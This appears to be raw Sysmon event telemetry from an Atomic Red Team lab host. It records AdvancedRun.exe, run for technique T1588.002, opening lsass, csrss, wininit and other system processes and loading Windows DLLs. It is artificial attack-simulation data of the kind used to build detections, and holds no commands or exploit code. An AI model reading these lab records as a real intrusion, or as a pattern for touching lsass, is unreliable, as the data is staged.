17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003983729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003983725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983724Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983701Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983700Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983699Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983698Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 